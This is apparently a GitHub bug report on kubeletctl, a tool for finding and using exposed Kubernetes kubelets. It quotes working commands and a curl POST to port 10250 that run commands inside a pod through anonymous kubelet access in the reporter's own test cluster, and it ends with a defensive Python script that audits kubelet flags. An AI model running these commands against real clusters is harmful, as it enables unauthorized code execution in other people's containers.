Scan RCE not working as intended
frankvoelker opened this issue
frankvoelker commented
Summary
kubeletctl scan rce -s SERVER
is not showing "+" on RCE column even though I can RCE
Steps to Reproduce
- Set up a microk8s cluster for testing
- allow anonymous Kubelet API access
- try to access https://SERVER:10250/pods to check for pods-json
- if you are allowed to see pods-json try to scan
kubeletctl scan rce -s SERVER
- also check if you can execute commands
Expected Results
If I am allowed to run kubeletctl exec "ls /" -c CONTAINER -p POD -s SERVER
I should see a + in the "scan RCE" list
Actual Results
I have only "-" signs on kubeletctl scan rce -s SERVER
but I can execute code
┌───────────────────────────────────────────────────────────────────────────────────────────────────────┐
│ Node with pods vulnerable to RCE │
├───┬───────────┬─────────────────────────────────────────┬─────────────┬─────────────────────────┬─────┤
│ │ NODE IP │ PODS │ NAMESPACE │ CONTAINERS │ RCE │
├───┼───────────┼─────────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ │ │ │ │ │ RUN │
├───┼───────────┼─────────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 1 │ 10.0.2.15 │ website-k8s-675dd9956d-qj58f │ default │ website-k8s │ - │
└───┴───────────┴─────────────────────────────────────────┴─────────────┴─────────────────────────┴─────┘
shows "-" on RCE column, but if I try to execute code I can do:
┌──(root@kali)-[/home/kali]
└─# kubeletctl exec "ls /" -p website-k8s-675dd9956d-qj58f -c website-k8s -s 10.0.2.15
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
I also saw in the source code that there is a POST request to check manually, and this is my output:
┌──(root@kali)-[/home/kali]
└─# curl -k -XPOST https://10.0.2.15:10250/run/default/website-k8s-675dd9956d-qj58f/website-k8s -d "cmd=ls /"
rpc error: code = Unknown desc = failed to exec in container: failed to start exec "2766ae987637b8f679d7f68cbe02868c5dad0af36a08e8ed961825a274ac444d": OCI runtime exec failed: exec failed: unable to start container process: exec: "": executable file not found in $PATH: unknown
Reproducible
- Always
- Sometimes
- Non-Reproducible
Version/Tag number
Version 1.11
Environment setup
- Running in self-hosted Linux (Debian) VirtualBox and installed MicroK8S
- Which cloud provider? Which container orchestrator (including version)?
Eviatar Gerzi commented
Thank you, we will check it.
Eviatar Gerzi commented
We found the problem and fixed it. It will be updated in the next release.
For now, you can clone the current repository and build it.
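
Whatever the scan column shows, the exposure in the reproduction steps comes from the kubelet accepting anonymous requests on port 10250. The following is an added example, not part of the issue thread or of kubeletctl: a small audit of a kubelet arguments file for that condition. The sample argument files are constructed, and the defaults assumed are the kubelet's flag defaults when no `--config` file overrides them.

```python
# Added example: audit kubelet flags for unauthenticated access to port 10250.
import shlex

# Assumed kubelet flag defaults when a flag is absent and no --config file is used.
DEFAULTS = {"anonymous-auth": "true", "authorization-mode": "AlwaysAllow"}
BOOL_FLAGS = {"anonymous-auth"}  # boolean flags only take a value via '='

# Constructed sample argument files (one flag per line, '#' comments allowed).
WEAK = "--anonymous-auth=true\n--authorization-mode=AlwaysAllow\n"
HARDENED = ("--anonymous-auth=false\n--authorization-mode=Webhook\n"
            "--client-ca-file=/path/to/ca.crt  # placeholder path\n")


def parse_kubelet_args(text):
    """Parse '--flag=value', '--flag value' and bare '--flag' tokens into a dict."""
    flags = {}
    tokens = shlex.split(text, comments=True)
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--"):
            name, sep, value = tok[2:].partition("=")
            if not sep:
                nxt = tokens[i + 1] if i + 1 < len(tokens) else "--"
                if name in BOOL_FLAGS or nxt.startswith("--"):
                    value = "true"          # bare flag
                else:
                    value, i = nxt, i + 1   # space-separated value
            flags[name] = value
        i += 1
    return flags


def audit(text):
    """Return findings; an empty list means requests need authn and authz."""
    flags = {**DEFAULTS, **parse_kubelet_args(text)}
    findings = []
    if flags["anonymous-auth"].lower() != "false":
        findings.append("anonymous-auth enabled: unauthenticated requests are accepted")
    if flags["authorization-mode"] != "Webhook":
        findings.append("authorization-mode=%s: requests are not authorized via the "
                        "API server" % flags["authorization-mode"])
    if "config" in flags:
        findings.append("--config set: review authentication/authorization there too")
    return findings


if __name__ == "__main__":
    for label, sample in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(sample) or "ok")
```
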